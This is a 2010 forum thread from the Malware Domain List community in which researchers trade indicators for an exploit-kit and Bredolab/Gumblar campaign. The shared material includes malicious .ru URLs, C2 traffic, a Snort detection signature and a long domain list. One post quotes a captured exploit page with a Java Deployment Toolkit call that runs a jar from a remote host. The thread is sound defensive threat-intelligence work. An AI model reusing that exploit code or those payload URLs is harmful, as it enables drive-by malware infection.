Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on May 17, 2010, 07:21:35 pm

Title: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 07:21:35 pm
Found a few exploit kits that are all ending in .ru and running on port 8080/TCP.

188.165.61.44 - relaxedgrape.ru - 8080/TCP

Entry:
http://relaxedgrape.ru:8080/google.com/download.com/sanspo.com.php

PDF:
http://relaxedgrape.ru:8080/Notes1.pdf
http://wepawet.iseclab.org/view.php?hash=818c879f5b8bf09642cee47394ef28a4&type=js

Java:
http://relaxedgrape.ru:8080/Applet1.html



188.165.192.22 - cornerrat.ru, rarephone.ru - 8080/TCP
Entry:
http://rarephone.ru:8080/index.php?pid=7

PDF:
http://rarephone.ru:8080/Notes7.pdf

Java:
http://rarephone.ru:8080/Applet7.html

Malware/Payload:
http://cornerrat.ru:8080/welcome.php?id=6&pid=1&hello=503


174.137.179.244 - globaljoke.ru, gothguilt.ru - 8080/TCP
Malware/Payload:
http://globaljoke.ru:8080/welcome.php?id=6&pid=1&hello=503
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 07:33:09 pm
188.165.192.22 - fewrocker.ru

Java:
http://fewrocker.ru:8080/Applet2.html
Title: Re: .ru domains over port 8080
Post by: philipp on May 17, 2010, 07:37:51 pm
188.165.192.22 - fewrocker.ru

Code: [Select]
200 http://fewrocker.ru:8080/
403 http://fewrocker.ru:8080/i/
403 http://fewrocker.ru:8080/22/
200 http://fewrocker.ru:8080/cache/
403 http://fewrocker.ru:8080/cgi-bin/
403 http://fewrocker.ru:8080/images/
200 http://fewrocker.ru:8080/new/
200 http://fewrocker.ru:8080/22/build.exe (MD5: 39ed2b2e25883aa21ae1dde13adf7d99)
403 http://fewrocker.ru:8080/22/33/
302 http://fewrocker.ru:8080/22/cgi-bin/
302 http://fewrocker.ru:8080/22/33/cgi-bin/
200 http://fewrocker.ru:8080/new/index.php
403 http://fewrocker.ru:8080/new/include/
200 http://fewrocker.ru:8080/new/install/
403 http://fewrocker.ru:8080/new/logs/
200 http://fewrocker.ru:8080/new/install/index.php
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 07:38:53 pm
Couple more, I'll keep updating the thread as I find stuff:

greatfile.ru - 85.17.19.26
valuablemind.ru - 94.75.243.6
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 07:41:55 pm
Bredolab I take it phillipp?

Quote
BM Tx Edition
Src:http://fewrocker.ru:8080/new/
Title: Re: .ru domains over port 8080
Post by: philipp on May 17, 2010, 07:49:49 pm
Bredolab I take it phillipp?

Quote
BM Tx Edition
Src:http://fewrocker.ru:8080/new/

BManager C&C Panel
Dont know if there is a connection to Bredolab though. Im not up-to-date at all :D
Title: Re: .ru domains over port 8080
Post by: CkreM on May 17, 2010, 07:58:49 pm
as far as i know BM is bredolab
Title: Re: .ru domains over port 8080
Post by: SysAdMini on May 17, 2010, 08:01:56 pm
as far as i know BM is bredolab

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
Title: Re: .ru domains over port 8080
Post by: CkreM on May 17, 2010, 08:08:46 pm
as far as i know BM is bredolab

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc

yeah, noticed that too.
could be a none connected file, or even a file downloaded by bredolab
Title: Re: .ru domains over port 8080
Post by: philipp on May 17, 2010, 08:27:38 pm
I see the binary posting data to
Code: [Select]
http://morechord.ru/home.php
Code: [Select]
VWlkMDo6MjlERDA0QTZ+fjI5REQwNEE2YGAyOUREMDRBNg0K
which looks like base64 encoded.

Code: [Select]
# morechord.ru
Domain: morechord.ru
 Reg: bushy@bigmailbox.ru
IP: 217.23.7.112
 RDNS:
 ASN: 49981 (NL)
IP: 217.20.47.85
 RDNS:
 ASN: 15830 (GB)
IP: 217.11.254.41
 RDNS: assigned-217-11-254-041.casablanca.cz
 ASN: 15685 (CZ)
IP: 88.191.47.83
 RDNS: sd-7664.dedibox.fr
 ASN: 12322 (FR)
IP: 217.148.89.77
 RDNS:
 ASN: 16237 (NL)
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 08:30:07 pm
as far as i know BM is bredolab

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc

What lead me to this nest of badness was a signature that fired for bredolab from that host. One from the VRT/Sourcefire guys the other from EmergingThreats.net both fired on a packet from this client system.

Request:
Code: [Select]
GET /new/controller.php?action=bot&entity_list=&first=1&rnd=981633&uid=1&guid=2678185660
HTTP/1.1
Host: bayjail.ru

Signature:
Code: [Select]
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPECIFIC-THREATS Bredolab downloader communication with server attempt"; flow:to_server,established; uricontent:"action="; nocase; uricontent:"entity"; nocase; uricontent:"rnd="; nocase; uricontent:"uid="; nocase; uricontent:"guid="; nocase; pcre:"/uid\x3D\d/Usmi"; pcre:"/guid\x3D\d/Usmi"; pcre:"/rnd\x3D\d/smiU"; metadata:policy balanced-ips drop, policy security-ips drop; reference:url,www.threatexpert.com/report.aspx?md5=b5a530185d35ea8305d3742e2ee5669f; classtype:trojan-activity; sid:16144; rev:2;)
I looked into what else the infected client system was connected to and then looked around for more *.ru domains that people were talking to over 8080/TCP.

EDIT:

I thought bayjail.ru was already on the MDL, I guess it isn't and should be added.

Code: [Select]
#nslookup bayjail.ru

Non-authoritative answer:
Name:    bayjail.ru
Addresses:  88.191.47.83
          217.11.254.41
          217.20.47.85
          217.23.7.112
          217.148.89.77
Title: Re: .ru domains over port 8080
Post by: SysAdMini on May 17, 2010, 08:31:09 pm

which looks like base64 encoded.


Noticed this too. Decoded string looks like an id.
Code: [Select]
Uid0::29DD04A6~~29DD04A6``29DD04A6
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 08:56:39 pm
Seen other infected hosts POSTing to foresaleonline.ru

Code: [Select]
#nslookup foresaleonline.ru

Non-authoritative answer:
Name:    foresaleonline.ru
Addresses:  217.11.254.41
          217.20.47.85
          217.148.89.77
          62.84.155.246
          88.191.47.83

The POST:

Code: [Select]
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"

VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K

------------XXXXXXXXXXXXXXXXXXXXXX--
Title: Re: .ru domains over port 8080
Post by: CkreM on May 17, 2010, 09:00:43 pm
Seen other infected hosts POSTing to foresaleonline.ru

Code: [Select]
#nslookup foresaleonline.ru
Server:  krusty.eid.doi.gov
Address:  10.10.2.3

Non-authoritative answer:
Name:    foresaleonline.ru
Addresses:  217.11.254.41
          217.20.47.85
          217.148.89.77
          62.84.155.246
          88.191.47.83

The POST:

Code: [Select]
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"

VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K

------------XXXXXXXXXXXXXXXXXXXXXX--

looks like an ftp stealer
Title: Re: .ru domains over port 8080
Post by: matt on May 17, 2010, 09:04:24 pm
I'm not sure if these domains are on the mdl, but I've seen hits on identical activity out of these domains with the associated dates if this helps the cause:

flowdisappear.ru / 82.211.7.32 (4/29)
passportblues.ru / 62.67.246.113 (5/5 + 5/12)
gigafleet.ru / 62.193.208.175 (5/6)
gothguilt.ru / 93.89.80.117 (5/13)
??? / 85.17.137.40 (5/15) # didn't capture the URL in this request, but fits the profile.
valuablemind.ru / 85.17.19.26 (5/17)

All of the requests are similar:

Code: [Select]
<html><head><title>Bob's Homepage</title></head><body><applet width='100%' height='100%' code='iPhoneBook' archive='Games.jar'><param name='site' VALUE='Njg3NDc0NzAzQTJGMkY2NzZGNzQ2ODY3NzU2OTZDNzQyRTcyNzUzQTM4MzAzODMwMkY3NzY1NkM2MzZGNkQ2NTJFNzA2ODcwM0Y2OTY0M0QzMTMxMjY3MDY5NjQzRDMxMjYzMTNEMzEyNjY0'></applet><applet code='sunny.Changes.class' archive='NewGames.jar' width='254' height='186'><param name='data' VALUE='http://gothguilt.ru:8080/welcome.php?id=9&pid=1&1=1'><param name='cc' value='1'></applet><script>
        var u = "http: -J-jar -J\\\\78.26.127.127\\public\\001.jar none";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");
            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
            o.launch(u);
        } else {
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");

            o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);


Title: Re: .ru domains over port 8080
Post by: SysAdMini on May 17, 2010, 10:05:13 pm
www.malc0de.com posted on Twitter a list of domains being used for that campaign.

Code: [Select]
1kinomall.ru
abr.zeytincilik.info
allturtle.ru
ashdog.ru
ashsoftware.ru
badmap.ru
bakedonion.ru
bayjail.ru
belowwatch.ru
bestfindaloan.cn
bestfinderr.cn
bigpremiumfind.cn
bigskytopguide.cn
bigtopfindsite.cn
blindbolt.ru
blueflame.ru
boldrace.ru
brilliantdad.ru
bunchguide.cn
busycloth.ru
casinoslotgamble.cn
celticradar.ru
center-kino.ru
cheap-drugshop.com
cheapfad.ru
cheapriot.ru
chokelabel.ru
clearquake.ru
combinebet.cn
cooltrack.ru
cornerrat.ru
creativeblockplay.cn
crushhead.ru
cutechair.ru
cutetrack.ru
dailyboss.ru
dating-4you.ru
dating-group.ru
dating-spot.ru
dieta-24.ru
dieta-optimal.ru
dieta-sexy.ru
dieta-tvoya.ru
dirtybody.ru
dirtysin.ru
dirtyzero.ru
dizzypizza.ru
drownpark.ru
drug-onlinestore.com
drugs-prostore.com
drugstore-menu.com
dullspa.ru
eastwombat.ru
easy-buydrugs.com
easydrugsbuy.com
energeticguy.ru
enter-pharmacyshop.com
evilpal.ru
fablips.ru
fardream.ru
fast-kino.ru
fewrocker.ru
fifthiron.ru
findbigmoneygame.cn
findbigshots.cn
findbigsoftpack.cn
findbigthinkers.cn
findyourbigidea.cn
firmwriter.ru
flowlaugh.ru
foresaleonline.ru
foundsmoke.ru
funnylead.ru
furryentry.ru
furrypipe.ru
futurevideo.ru
getdrugs-store.com
giantpremium.cn
gianttopdiscover.cn
gianttoplocate.cn
gigafleet.ru
globaljoke.ru
goodpool.ru
gothguilt.ru
greatfile.ru
gripgrate.ru
hadcorn.ru
harshdye.ru
healthy-dieta.ru
heavycloud.ru
help-vizov.ru
herpark.ru
hochutebia.ru
hostdnssite.com
hostindianet.com
hotgas.ru
hotsex-meets.ru
hugetoplocate.cn
hugetopseek.cn
icebus.ru
illmap.ru
indypages.ru
innerduck.ru
insidecan.ru
internet-drugmenu.com
ironstar.ru
juicyfile.ru
kindsunday.ru
kino-mall.ru
kino-shops.ru
labelstare.ru
lameflash.ru
lastspider.ru
latevenom.ru
lazyloss.ru
lazyrow.ru
leakymaid.ru
lessjazz.ru
lightword.ru
litetopfindworld.cn
litwire.ru
lkgjhjbh.balkansport.info
longcloud.ru
lostdeed.ru
lotbetsite.cn
lotwageronline.cn
lovemine.ru
love-pair.ru
lunchscone.ru
macroarea.ru
magic-dieta.ru
mediahousenamebuypicture.cn
megahotgirls.ru
megawomen.ru
menu-pharmacyshop.com
michaelsbestway2findalawyer.cn
micmarket.ru
microdoor.ru
mildroom.ru
miniarms.ru
ministate.ru
missgin.ru
mixbetonline.cn
mixbetworld.cn
mixwager.cn
modelprod.ru
mondaybubble.ru
mondayring.ru
morechord.ru
mushylion.ru
nearzit.ru
needtempt.ru
netwebinternet.ru
newnetnameshop.cn
noknack.ru
nosypipe.ru
nothill.ru
notkey.ru
ns1.bestservicehost.com
nudechicks.ru
oddbabe.ru
odnoklassniki-nochiu.ru
odnoklassnikinochiu.ru
oldpresident.ru
onebeard.ru
onelead.ru
onewinter.ru
online-drugshop.com
online-drugsstore.com
ourdope.ru
ourriver.ru
pangreed.ru
parkinglotbet.cn
passportblues.ru
pearlpole.ru
petlips.ru
petquestion.ru
petsample.ru
petwife.ru
pillsmartshop.com
pinkhack.ru
playslotbet.cn
politicalpoets.ru
powerbarrel.ru
powermixplay.cn
premiumlocate.cn
prickheal.ru
priorface.ru
priorsmell.ru
q0c.ru
q0l.ru
q0x.in
q0x.ru
q1f.ru
q1n.ru
q1x.ru
q3e.ru
q5x.ru
radicalgirl.ru
radjoker.ru
radtune.ru
rareelf.ru
rarephone.ru
rattyduck.ru
rawshower.ru
redspinster.ru
redwriter.ru
relaxedgrape.ru
richsign.ru
romantube.ru
roundgain.ru
roundhour.ru
roundmaker.ru
roundpad.ru
roundroad.ru
rubybrush.ru
rudeair.ru
ruralmist.ru
saltyriver.ru
saltysky.ru
scaryloss.ru
sdfasdf.vangangelt.info
secretaxe.ru
sex-army.ru
shinyrock.ru
shopmovielife.cn
shortfeet.ru
siliconemist.ru
sixthrush.ru
skepticalpub.ru
sleepydream.ru
slickfilm.ru
smallbars.ru
softstage.ru
soggyzero.ru
soreentry.ru
sos-vizov.ru
soundrisk.ru
southernpeg.ru
sparechief.ru
sparemat.ru
special-call.ru
special-message.ru
spellload.ru
spicygirls.ru
spicyledge.ru
spicyyear.ru
spotsnow.ru
springarctic.ru
srochniy-zvonok.ru
stallshare.ru
stellarshower.ru
store-drugs4u.com
stuckdate.ru
stuffstep.ru
suavepad.ru
subroyalty.ru
sunnycurse.ru
superbetsports.cn
surechip.ru
tallpen.ru
tameconcert.ru
tangystar.ru
tapclip.ru
tartshow.ru
tastysea.ru
telechart.ru
tenderavatar.ru
tenthprofit.ru
terminalpoem.ru
thebestwaytofind.cn
thecutpricegroup.cn
themixbet.cn
tightspace.ru
torncurrent.ru
tornmum.ru
ultimatecomfort.ru
urbandream.ru
usetune.ru
validbanner.ru
validfolk.ru
valuablemind.ru
vastdiary.ru
vastinsect.ru
vastobject.ru
vasttune.ru
videoroyal.ru
wantdive.ru
weakimage.ru
wearyyear.ru
westcountry.ru
westlips.ru
wetfunction.ru
wetgeek.ru
wooddemand.ru
worstfuel.ru
wovenplane.ru
wovenshelf.ru
xochu-dating.ru
yourbettas.cn
yourcombine.cn
yourmoose.ru
yoursoap.ru
yummygirls.ru
zdorovaya-diet.ru
zipbin.ru
zvonok-sos.ru
zvonok-spasatel.ru
Title: Re: .ru domains over port 8080
Post by: Kimberly on May 18, 2010, 03:06:34 am
it's Gumblar ;) en.wikipedia.org/wiki/Gumblar

Got them last week already, injected obfuscated script in glype proxy

gothguilt.ru.
78.32.1.70
88.165.95.133
88.165.124.185
12.19.216.11
4.23.92.35
linezing.com
19.42.227.248
jsunpack.jeek.org/dec/go?report=5b719b16905d80a41829f672915c2c56ad9aefb5
jsunpack.jeek.org/dec/go?report=c918247e34f214e96704398b6883d840fcff2473
jsunpack.jeek.org/dec/go?report=2255ccef47b208679bb47f1809127108e7c3bbd7
gothguilt.ru:8080/hsbc-co-uk/google.com/linezing.com.php
gothguilt.ru:8080/aol-co-uk/google.com/yahoo.com.cn.php
Title: Re: .ru domains over port 8080
Post by: SysAdMini on May 19, 2010, 03:32:48 am
listed by malc0de.

http://malc0de.com/database/index.php?search=.ru%3A8080